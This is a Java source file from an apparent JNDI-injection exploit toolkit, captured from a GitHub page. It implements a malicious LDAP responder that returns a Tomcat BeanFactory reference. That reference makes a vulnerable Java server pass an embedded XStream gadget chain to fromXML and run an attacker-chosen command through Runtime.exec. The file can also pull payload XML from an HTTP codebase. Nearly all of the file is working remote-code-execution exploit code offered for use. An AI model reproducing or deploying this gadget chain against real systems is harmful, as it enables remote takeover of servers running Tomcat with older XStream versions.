-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathTomcatXStream.java
141 lines (126 loc) · 5.55 KB
/
TomcatXStream.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
package net.roboterh.injector.gadgets;
import cn.hutool.http.HttpUtil;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import net.roboterh.injector.enums.PayloadEnum;
import net.roboterh.injector.servers.HTTPServer;
import net.roboterh.injector.utils.GadgetUtils;
import net.roboterh.injector.utils.PayloadUtils;
import org.apache.log4j.LogManager;
import org.apache.log4j.Logger;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import java.util.Arrays;
/*
Tomcat XStream Way:
Requirement:
Tomcat and XStream < 1.4.17 in classpath
Explanation:
call com.thoughtworks.xstream.XStream#fromXML to load malicious xml
*/
public class TomcatXStream implements LDAPService{
private static final Logger logger = LogManager.getLogger(TomcatXStream.class);
private PayloadEnum payload;
private String[] params;
private String xmlScript;
@Override
public void sendResult(InMemoryInterceptedSearchResult result, String baseDN) {
argsHandler(baseDN);
generateHandler();
try {
logger.info(String.format("Send LDAP result for %s using TomcatXStream Way ...", baseDN));
// create ResourceRef
ResourceRef ref = new ResourceRef("com.thoughtworks.xstream.XStream", null, "", "",
true, "org.apache.naming.factory.BeanFactory", null);
ref.add(new StringRefAddr("forceString", "a=fromXML"));
ref.add(new StringRefAddr("a", xmlScript));
Entry entry = new Entry(baseDN);
entry.addAttribute("javaClassName", "java.lang.Class");
entry.addAttribute("javaSerializedData", GadgetUtils.serialize(ref));
result.sendSearchEntry(entry);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
} catch (Exception e) {
logger.info(e.getMessage());
}
}
@Override
public void argsHandler(String baseDN) {
int firstIndex = baseDN.indexOf("/");
int secondIndex = baseDN.indexOf("/", firstIndex + 1);
// obtain the value of Payload
payload = PayloadEnum.valueOf(baseDN.substring(firstIndex + 1, secondIndex));
// add params
switch (payload.name()) {
case "Command":
String cmd = PayloadUtils.getCmdFromBase(baseDN);
params = new String[]{cmd};
break;
case "File":
String filename = baseDN.substring(baseDN.lastIndexOf("/") + 1);
params = new String[]{filename};
break;
}
logger.info(String.format("Received Payload is %s, params are %s ...", payload, Arrays.toString(params)));
}
@Override
public void generateHandler() {
try {
TomcatXStreamTemplate tomcatXStreamTemplate = new TomcatXStreamTemplate();
switch (payload.name()) {
case "Command":
xmlScript = tomcatXStreamTemplate.getExecCode(params[0]);
break;
case "File":
xmlScript = HttpUtil.get(HTTPServer.codeBase + params[0]);
break;
}
} catch (Exception e) {
logger.info(e.getMessage());
}
}
private class TomcatXStreamTemplate {
private String template = "<java.util.PriorityQueue serialization='custom'>\n" +
" <unserializable-parents/>\n" +
" <java.util.PriorityQueue>\n" +
" <default>\n" +
" <size>2</size>\n" +
" </default>\n" +
" <int>3</int>\n" +
" <dynamic-proxy>\n" +
" <interface>java.lang.Comparable</interface>\n" +
" <handler class='sun.tracing.NullProvider'>\n" +
" <active>true</active>\n" +
" <providerType>java.lang.Comparable</providerType>\n" +
" <probes>\n" +
" <entry>\n" +
" <method>\n" +
" <class>java.lang.Comparable</class>\n" +
" <name>compareTo</name>\n" +
" <parameter-types>\n" +
" <class>java.lang.Object</class>\n" +
" </parameter-types>\n" +
" </method>\n" +
" <sun.tracing.dtrace.DTraceProbe>\n" +
" <proxy class='java.lang.Runtime'/>\n" +
" <implementing__method>\n" +
" <class>java.lang.Runtime</class>\n" +
" <name>exec</name>\n" +
" <parameter-types>\n" +
" <class>java.lang.String</class>\n" +
" </parameter-types>\n" +
" </implementing__method>\n" +
" </sun.tracing.dtrace.DTraceProbe>\n" +
" </entry>\n" +
" </probes>\n" +
" </handler>\n" +
" </dynamic-proxy>\n" +
" <string>{cmd}</string>\n" +
" </java.util.PriorityQueue>\n" +
"</java.util.PriorityQueue>";
public String getExecCode(String cmd) {
return template.replace("{cmd}", cmd);
}
}
}